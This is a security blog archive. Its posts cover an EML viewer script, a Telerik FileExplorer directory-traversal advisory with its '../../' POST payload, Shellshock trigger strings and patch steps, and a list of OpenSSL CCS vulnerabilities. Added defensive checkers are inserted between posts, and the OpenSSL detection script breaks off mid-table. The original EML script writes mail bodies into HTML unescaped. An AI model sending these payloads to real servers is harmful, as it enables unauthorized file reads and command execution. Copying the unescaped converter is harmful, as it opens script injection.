<a href="https://www.youtube.com/channel/UC_M0dk4dvcBr_rFgi710D4Q">https://www.youtube.com/channel/UC_M0dk4dvcBr_rFgi710D4Q</a><br />
<br />
Posted by Kerz, 2015-08-26<br />
<b>Python EML file viewer (simple version)</b><br />
<span style="font-family: Verdana, sans-serif;">Sometimes employees pass .eml files to me for reference.</span><br />
<span style="font-family: Verdana, sans-serif;">Unfortunately, I don't have an eml viewer....</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">So I just wrote a simple converter from .eml to HTML that handles only text/plain parts encoded in base64.</span><br />
<span style="font-family: Verdana, sans-serif;">When I searched for a Python module to convert eml, I found the "email" module.</span><br />
<span style="font-family: Verdana, sans-serif;">But I only need a simple version. :)</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I hope it helps with your work. :)</span><br />
<br />
<br />
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">import base64
import re

filename = "./1.eml"

with open(filename, "r") as f:
    lines = f.read().splitlines()

# Walk the message line by line. When a "Content-Type: text/plain" header
# starts a part, read that part's remaining headers; if the part is
# base64-encoded, collect its body up to the next blank line or MIME
# boundary. Assumes Content-Type precedes Content-Transfer-Encoding, as
# most mailers emit them.
decoded = []
i = 0
while i < len(lines):
    if not re.match(r"Content-Type:\s*text/plain", lines[i], re.I):
        i += 1
        continue
    is_base64 = False
    while i < len(lines) and lines[i] != "":
        if re.match(r"Content-Transfer-Encoding:\s*base64", lines[i], re.I):
            is_base64 = True
        i += 1
    i += 1  # skip the blank line that ends the part headers
    if not is_base64:
        continue
    body = []
    while i < len(lines) and lines[i] != "" and not lines[i].startswith("--"):
        body.append(lines[i])
        i += 1
    decoded.append(base64.b64decode("".join(body)).decode("utf-8", "replace"))

with open(filename + "_convert.html", "w") as con_f:
    con_f.write("<b>CONVERT: ONLY PLAIN/TEXT</b><br /><br />\n")
    con_f.write("\n".join(decoded))
</code></pre>
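One caveat a reviewer would raise about the script above: it writes the decoded message body straight into an .html file, so any tag or script inside the mail is rendered when that file is opened in a browser. The added example below (mine, not the post's) does the same conversion with the standard "email" module the post mentions, which handles multipart messages, charsets and every transfer encoding, and passes all message-derived text through `html.escape` so it is displayed rather than executed. `SAMPLE_EML` is a constructed message built inline so the example runs offline.

```python
import base64
import html
from email import message_from_bytes, policy

# Constructed sample mail (not a real message): a multipart message whose
# text/plain part is base64-encoded and contains markup that must not be
# rendered when the converted file is opened in a browser.
BODY_TEXT = "Hello,\nplease review <script>alert(1)</script> before Friday.\n"
SAMPLE_EML = (
    b"From: alice@example.test\r\n"
    b"To: bob@example.test\r\n"
    b"Subject: constructed sample\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/alternative; boundary="XYZ"\r\n'
    b"\r\n"
    b"--XYZ\r\n"
    b"Content-Type: text/plain; charset=utf-8\r\n"
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n"
    + base64.encodebytes(BODY_TEXT.encode("utf-8")).replace(b"\n", b"\r\n")
    + b"--XYZ\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Transfer-Encoding: 7bit\r\n"
    b"\r\n"
    b"<p>Hello, <b>please review</b></p>\r\n"
    b"--XYZ--\r\n"
)


def eml_plain_parts(raw):
    """Return the decoded text of every text/plain part, whatever its
    transfer encoding (base64, quoted-printable, 7bit) or charset."""
    msg = message_from_bytes(raw, policy=policy.default)
    return [part.get_content() for part in msg.walk()
            if part.get_content_type() == "text/plain"]


def eml_to_html(raw):
    """Render a few headers and the text/plain parts as HTML. Everything
    taken from the message goes through html.escape, so a body containing
    tags or script is shown as text instead of being interpreted."""
    msg = message_from_bytes(raw, policy=policy.default)
    out = ["<b>CONVERT: ONLY TEXT/PLAIN</b><br /><br />\n"]
    for name in ("From", "To", "Subject", "Date"):
        if msg[name] is not None:
            out.append("<b>%s:</b> %s<br />\n" % (name, html.escape(str(msg[name]))))
    for text in eml_plain_parts(raw):
        out.append("<pre>%s</pre>\n" % html.escape(text))
    return "".join(out)


if __name__ == "__main__":
    print(eml_to_html(SAMPLE_EML))
```

To convert a real file, read it with `open(path, "rb").read()` and pass the bytes to `eml_to_html`; the text/html alternative is deliberately ignored, matching the post's plain-text-only scope.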
Posted by Kerz, 2015-05-18<br />
<b>DEFCON 23 CTF Write up (Links)</b><br />
<div style="border: 0px; color: #383838; font-family: gotham, helvetica, arial, sans-serif; font-size: 14px; line-height: 1.571428em; margin: 0px; padding: 0px;">
<h3 style="border: 0px; font-size: 1em; line-height: 1.571428em; margin: 1.4285em 0px 0.714285em; padding: 0px;">
Defcon 23 Quals Writeup</h3>
</div>
<div style="border: 0px; color: #383838; font-family: gotham, helvetica, arial, sans-serif; font-size: 14px; line-height: 1.571428em; margin: 0px; padding: 0px;">
<a data-mce-href="http://d.hatena.ne.jp/Kango/20150518/1431907470" href="http://d.hatena.ne.jp/Kango/20150518/1431907470" shape="rect" style="border: 0px; color: #047ac6; cursor: pointer; line-height: 1.571428em; margin: 0px; padding: 0px;" target="_blank">http://d.hatena.ne.jp/Kango/20150518/1431907470</a></div>
<div style="border: 0px; color: #383838; font-family: gotham, helvetica, arial, sans-serif; font-size: 14px; line-height: 1.571428em; margin: 0px; padding: 0px;">
<a data-mce-href="http://lockboxx.blogspot.com/" href="http://lockboxx.blogspot.com/" shape="rect" style="border: 0px; color: #047ac6; cursor: pointer; line-height: 1.571428em; margin: 0px; padding: 0px;" target="_blank">http://lockboxx.blogspot.com/</a></div>
Posted by Kerz, 2014-11-12<br />
<b>Telerik File Explorer Directory Traversal</b><br />
# Exploit Title: Telerik FileExplorer Directory Traversal<br />
# Date: 12/11/2014<br />
# Exploit Author: Kerz<br />
# Vendor Homepage: www.telerik.com<br />
# Software Link: http://www.telerik.com/products/aspnet-ajax.aspx<br />
# Version: Q3 2014<br />
# Tested on: Windows OS<br />
# CVE: None<br />
<br />
A malicious user sends a malformed request that reads files from parent directories, as follows:<br />
<br />
http://target_URL/FileExplorer.aspx<br />
[POST Data]<br />
&__CALLBACKPARAM -> "path":"../../"<br />
<br />
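Both the RESPONSIVE filemanager `fldr` parameter in the earlier advisory and the Telerik `path` callback value above fail the same way: a user-supplied folder name is joined to a base directory without checking where it ends up. The following is an added example of the server-side check that prevents it (my code, not from either product or advisory); `UPLOAD_ROOT` is a hypothetical base directory. It treats `\` and `/` alike, because the filemanager advisory shows the traversal succeeding with `..\` on Windows, and it decides on the normalised result rather than by searching for the literal string `..`.

```python
import posixpath

# Hypothetical document root of the file manager (assumed value, not from
# either advisory).
UPLOAD_ROOT = "/var/www/app/uploads"


def is_traversal_attempt(user_path):
    """Detection helper for logging/alerting: True if any path segment is
    '..', with both '/' and '\\' treated as separators."""
    segments = user_path.replace("\\", "/").split("/")
    return ".." in segments


def resolve_user_path(base_dir, user_path):
    """Return the absolute path a user-supplied folder value maps to, or None
    if it would escape base_dir.

    The decision is made on a normalised, separator-unified path, so '..\\',
    'a/../../b' and an absolute path are all caught by the same rule."""
    candidate = user_path.replace("\\", "/")
    # NUL bytes can truncate the path in C-level filesystem calls; refuse them.
    if "\x00" in candidate:
        return None
    # Drop any leading slash so the value is always relative to the base.
    candidate = candidate.lstrip("/")
    base = posixpath.normpath(base_dir)
    full = posixpath.normpath(posixpath.join(base, candidate))
    # Accept the base itself or anything strictly below it. Comparing with
    # base + "/" stops a sibling such as "/var/www/app/uploads_old" from
    # passing a plain startswith(base) check.
    if full != base and not full.startswith(base + "/"):
        return None
    return full


if __name__ == "__main__":
    for value in ("reports", "..\\..\\..\\", "../../", "a/../b", "../uploads_old/x"):
        print("%-18r traversal=%-5s -> %s" % (
            value, is_traversal_attempt(value), resolve_user_path(UPLOAD_ROOT, value)))
```

On a real server, resolve symbolic links as well (`os.path.realpath`) before the containment check, since a link inside the base directory can point outside it; `posixpath` is used here so the example behaves identically on every platform.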
Thanks<br />
<br />
Posted by Kerz, 2014-10-30<br />
<b>Penetration test sample report</b><br />
This looks like a nice pentest sample report.<br />
<br />
<a href="http://www.offensive-security.com/penetration-testing-sample-report.pdf">http://www.offensive-security.com/penetration-testing-sample-report.pdf</a><br />
<br />
<br />
Posted by Kerz, 2014-10-23<br />
<b>Shellshock</b><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><span style="font-size: large;">Shellshock</span></b>, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Point of the vulnerability: '</span><span style="font-family: Arial, Helvetica, sans-serif;"><b>:() { :; };</b>'</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">How to fix</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>CentOS, Ubuntu, Linux systems</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>[yum]</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">yum update bash -y</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b style="font-family: Arial, Helvetica, sans-serif;">[apt-get]</b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">apt-get update; apt-get install --only-upgrade bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b style="font-family: Arial, Helvetica, sans-serif;">[pacman]</b><br />
<span style="font-family: Arial, Helvetica, sans-serif;">pacman -Syu</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>OS X</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>[Brew]</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">brew update</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">brew install bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo sh -c 'echo "/usr/local/bin/bash" >> /etc/shells'</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">chsh -s /usr/local/bin/bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo mv /bin/bash /bin/bash-backup</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo ln -s /usr/local/bin/bash /bin/bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>[MacPorts]</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo port selfupdate</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">sudo port upgrade bash</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
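Two defender-side checks for the bug described above, as an added example that is not from this post nor from the shellshock-scanner it links to. `find_shellshock_probes` runs the detection logic over constructed web-server log lines (not real traffic) and flags any request field that contains a bash function definition, in raw or URL-encoded form. `bash_is_vulnerable` runs the public self-test from shellshocker.net against the local bash: a patched bash ignores the command that follows the function body in the environment variable. Function names and the sample log are mine.

```python
import re
import subprocess
from urllib.parse import unquote

# A bash function definition followed by further commands: "() {" ... "};".
# Every Shellshock probe has this shape, whatever it carries after the brace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Constructed Apache access-log lines (not real traffic). Line 1 carries the
# public test string in the User-Agent, line 3 the same thing URL-encoded in
# the query string; lines 2 and 4 are benign and contain parentheses and
# braces of their own.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo shellshock-test"',
    '198.51.100.4 - - [25/Sep/2014:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"',
    '203.0.113.7 - - [25/Sep/2014:10:02:19 +0000] "GET /cgi-bin/test.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B%20echo HTTP/1.1" 500 0 "-" "curl/7.38.0"',
    '192.0.2.9 - - [25/Sep/2014:10:02:23 +0000] "GET /api/items?q=%7B%22a%22%3A1%7D HTTP/1.1" 200 77 "-" "python-requests/2.4"',
]


def find_shellshock_probes(log_lines):
    """Return (line_number, matched_text) for every log line that contains a
    bash function definition, checking the raw line and its URL-decoded form."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        for view in (line, unquote(line)):
            m = SHELLSHOCK_RE.search(view)
            if m:
                hits.append((number, m.group(0)))
                break
    return hits


def bash_is_vulnerable(bash_path="bash"):
    """Run the public shellshocker.net self-test against a local bash: export a
    variable holding a function definition with a trailing command. A patched
    bash prints only "test"; an unpatched one also runs the trailing echo.
    Returns True/False, or None if bash cannot be executed."""
    env = {"x": "() { :;}; echo vulnerable", "PATH": "/usr/bin:/bin"}
    try:
        result = subprocess.run([bash_path, "-c", "echo test"], env=env,
                                capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in result.stdout


if __name__ == "__main__":
    for number, text in find_shellshock_probes(SAMPLE_LOG):
        print("line %d: probe %r" % (number, text))
    print("local bash vulnerable:", bash_is_vulnerable())
```

The log check is only as good as what the server logs: headers other than User-Agent and Referer are usually not written to the access log, so a web application firewall or request-header logging is needed to see probes carried in Cookie or custom headers.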
<span style="font-family: Arial, Helvetica, sans-serif;"><br />Reference: <br />[gry/shellshock-scanner]<br />https://github.com/gry/shellshock-scanner<br />https://github.com/gry/shellshock-scanner/blob/master/shellshock_scanner.py</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">https://shellshocker.net/</span><br />
<br />
Posted by Kerz, 2014-06-13<br />
<b>OpenSSL CCS Inject - TEST</b><br />
<span style="font-family: inherit;">OpenSSL currently has many vulnerabilities.</span><br />
<b style="white-space: pre-wrap;"><span style="font-family: inherit;"><br /></span></b>
<b style="white-space: pre-wrap;"><span style="font-family: inherit;">Vulnerabilities:</span></b><br />
<span style="font-family: inherit;"><i><br /></i>
<i>CVE-2014-0224 (MitM)</i></span><br />
<span style="background-color: white; font-family: inherit;">OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.</span><br />
<span style="font-family: inherit;"><br />
<i>CVE-2014-0221 (DoS)</i></span><br />
<span style="background-color: white; font-family: inherit;">The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake.</span><br />
<span style="font-family: inherit;"><br />
<i>CVE-2014-0195 (Remote Code Execution)</i></span><br />
<span style="background-color: white; font-family: inherit;">The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.</span><br />
<i style="font-family: inherit; white-space: pre-wrap;"><br /></i>
<i style="font-family: inherit; white-space: pre-wrap;">CVE-2014-0198 (Remote Code Execution)</i><br />
<span style="background-color: white; font-family: inherit;">The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition.</span><br />
<span style="font-family: inherit;"><span style="background-color: white;"><br /></span>
<span style="background-color: white; white-space: pre-wrap;"><i>CVE-2010-5298 (Inject data, DoS)</i></span></span><br />
<span style="background-color: white; font-family: inherit;">Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment.</span><br />
<span style="font-family: inherit;"><br />
<i>CVE-2014-3470 (DoS)</i></span><br />
<span style="background-color: white; font-family: inherit;">The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value.</span><br />
<span style="font-family: inherit;"><br />
<span style="background-color: white;"><b>Affected Versions:</b></span></span><br />
<span style="font-family: inherit; white-space: pre-wrap;">OpenSSL 0.9.8 DTLS</span><br />
<span style="font-family: inherit; white-space: pre-wrap;">OpenSSL 1.0.0 DTLS</span><br />
<span style="font-family: inherit; white-space: pre-wrap;">OpenSSL 1.0.1 DTLS</span><br />
<span style="font-family: inherit;"><span style="background-color: white;"><br /></span>
<span style="background-color: white;"><b>Upgrade to:</b></span></span><br />
<span style="background-color: white; font-family: inherit;">0.9.8za Version</span><br />
<span style="font-family: inherit;"><span style="background-color: white;">1.0.0m Version</span></span><br />
<span style="font-family: inherit;"><span style="background-color: white;">1.0.1h Version</span></span><br />
<span style="font-family: inherit;"><br /></span>
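A quick way to turn the "Upgrade to" list above into a check: parse the output of `openssl version` and compare it with the fixed release of the same branch. This is an added example (mine, not the post's and not the Tripwire tool below); the only inputs it relies on are the three fixed versions the post names. OpenSSL patch levels are letters that sort a < b < ... < z < za < zb, which the `patch_key` helper reproduces.

```python
import re

# Fixed releases named in the post: a build is safe if it is at or above the
# fix for its own branch, or on a newer branch.
FIXED = {"0.9.8": "za", "1.0.0": "m", "1.0.1": "h"}
FIXED_BRANCHES = sorted(tuple(int(x) for x in b.split(".")) for b in FIXED)

VERSION_RE = re.compile(r"OpenSSL\s+(\d+)\.(\d+)\.(\d+)([a-z]*)")


def patch_key(letters):
    """OpenSSL patch letters sort a < b < ... < z < za < zb ...; comparing
    (length, letters) reproduces that order ('y' < 'za', 'za' < 'zb')."""
    return (len(letters), letters)


def parse_openssl_version(banner):
    """Extract (major, minor, fix, letters) from `openssl version` output,
    or None if the banner is not an OpenSSL version string."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4))


def is_ccs_fixed(banner):
    """True if the banner names a release carrying the CVE-2014-0224 fix,
    False if it predates the fix, None if the banner cannot be parsed."""
    parsed = parse_openssl_version(banner)
    if parsed is None:
        return None
    branch, letters = parsed[:3], parsed[3]
    branch_name = "%d.%d.%d" % branch
    if branch_name in FIXED:
        return patch_key(letters) >= patch_key(FIXED[branch_name])
    # Branches not in the table: anything older than 0.9.8 never got the
    # fix; 1.0.2 and later were released after it.
    return branch > max(FIXED_BRANCHES)


if __name__ == "__main__":
    # Constructed banners in the format `openssl version` prints.
    for banner in ("OpenSSL 1.0.1g 7 Apr 2014", "OpenSSL 1.0.1h 5 Jun 2014",
                   "OpenSSL 0.9.8y 5 Feb 2013", "OpenSSL 0.9.8za 5 Jun 2014"):
        print("%-28s fixed=%s" % (banner, is_ccs_fixed(banner)))
```

One caveat: distributions such as RHEL and Debian backport fixes without changing the version letter, so a banner like "1.0.1e" can be patched; for those systems, check the package changelog or run a handshake test like the one below instead of trusting the banner.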
<span style="background-color: white; font-family: inherit; white-space: pre-wrap;">You can test whether your OpenSSL build is vulnerable with the script below.</span><br />
<div>
<br /></div>
<span style="font-family: inherit;">
<span style="background-color: white; white-space: pre-wrap;"><b>Python code (CCS inject detection, test):</b></span></span><br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">#!/bin/python
import sys
import socket
import time
import struct

if len(sys.argv)<2:
    print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.2 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
    quit()
else:
    strHost = sys.argv[1]

if len(sys.argv)>2:
    try:
        iPort = int(sys.argv[2])
    except:
        print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.2\nUsage: %s <host> [port=443]" % (sys.argv[0])
        quit()
else:
    iPort = 443

print "***CVE-2014-0224 Detection Tool v0.2***\nBrought to you by Tripwire VERT (@TripwireVERT)"

dSSL = {
    "SSLv3" : "\x03\x00",
    "TLSv1" : "\x03\x01",
    "TLSv1.1" : "\x03\x02",
    "TLSv1.2" : "\x03\x03",
}
# The following is a complete list of ciphers for the SSLv3 family up to TLSv1.2
ssl3_cipher = dict()
ssl3_cipher['\x00\x00'] = "TLS_NULL_WITH_NULL_NULL"
ssl3_cipher['\x00\x01'] = "TLS_RSA_WITH_NULL_MD5"
ssl3_cipher['\x00\x02'] = "TLS_RSA_WITH_NULL_SHA"
ssl3_cipher['\x00\x03'] = "TLS_RSA_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x04'] = "TLS_RSA_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x05'] = "TLS_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x06'] = "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5"
ssl3_cipher['\x00\x07'] = "TLS_RSA_WITH_IDEA_CBC_SHA"
ssl3_cipher['\x00\x08'] = "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x09'] = "TLS_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x0a'] = "TLS_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x0b'] = "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x0c'] = "TLS_DH_DSS_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x0d'] = "TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x0e'] = "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x0f'] = "TLS_DH_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x10'] = "TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x11'] = "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x12'] = "TLS_DHE_DSS_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x13'] = "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x14'] = "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x15'] = "TLS_DHE_RSA_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x16'] = "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x17'] = "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x18'] = "TLS_DH_anon_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x19'] = "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA"
ssl3_cipher['\x00\x1a'] = "TLS_DH_anon_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x1b'] = "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x1c'] = "SSL_FORTEZZA_KEA_WITH_NULL_SHA"
ssl3_cipher['\x00\x1d'] = "SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA"
ssl3_cipher['\x00\x1e'] = "SSL_FORTEZZA_KEA_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x1E'] = "TLS_KRB5_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x1F'] = "TLS_KRB5_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x20'] = "TLS_KRB5_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x21'] = "TLS_KRB5_WITH_IDEA_CBC_SHA"
ssl3_cipher['\x00\x22'] = "TLS_KRB5_WITH_DES_CBC_MD5"
ssl3_cipher['\x00\x23'] = "TLS_KRB5_WITH_3DES_EDE_CBC_MD5"
ssl3_cipher['\x00\x24'] = "TLS_KRB5_WITH_RC4_128_MD5"
ssl3_cipher['\x00\x25'] = "TLS_KRB5_WITH_IDEA_CBC_MD5"
ssl3_cipher['\x00\x26'] = "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA"
ssl3_cipher['\x00\x27'] = "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA"
ssl3_cipher['\x00\x28'] = "TLS_KRB5_EXPORT_WITH_RC4_40_SHA"
ssl3_cipher['\x00\x29'] = "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5"
ssl3_cipher['\x00\x2A'] = "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5"
ssl3_cipher['\x00\x2B'] = "TLS_KRB5_EXPORT_WITH_RC4_40_MD5"
ssl3_cipher['\x00\x2C'] = "TLS_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2D'] = "TLS_DHE_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2E'] = "TLS_RSA_PSK_WITH_NULL_SHA"
ssl3_cipher['\x00\x2F'] = "TLS_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x30'] = "TLS_DH_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x31'] = "TLS_DH_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x32'] = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x33'] = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x34'] = "TLS_DH_anon_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x35'] = "TLS_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x36'] = "TLS_DH_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x37'] = "TLS_DH_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x38'] = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x39'] = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x3A'] = "TLS_DH_anon_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x3B'] = "TLS_RSA_WITH_NULL_SHA256"
ssl3_cipher['\x00\x3C'] = "TLS_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x3D'] = "TLS_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x3E'] = "TLS_DH_DSS_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x3F'] = "TLS_DH_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x40'] = "TLS_DHE_DSS_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x41'] = "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x42'] = "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x43'] = "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x44'] = "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x45'] = "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x46'] = "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA"
ssl3_cipher['\x00\x60'] = "TLS_RSA_EXPORT1024_WITH_RC4_56_MD5"
ssl3_cipher['\x00\x61'] = "TLS_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5"
ssl3_cipher['\x00\x62'] = "TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x63'] = "TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA"
ssl3_cipher['\x00\x64'] = "TLS_RSA_EXPORT1024_WITH_RC4_56_SHA"
ssl3_cipher['\x00\x65'] = "TLS_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA"
ssl3_cipher['\x00\x66'] = "TLS_DHE_DSS_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x67'] = "TLS_DHE_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x68'] = "TLS_DH_DSS_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x69'] = "TLS_DH_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6A'] = "TLS_DHE_DSS_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6B'] = "TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x6C'] = "TLS_DH_anon_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\x6D'] = "TLS_DH_anon_WITH_AES_256_CBC_SHA256"
ssl3_cipher['\x00\x80'] = "TLS_GOSTR341094_WITH_28147_CNT_IMIT"
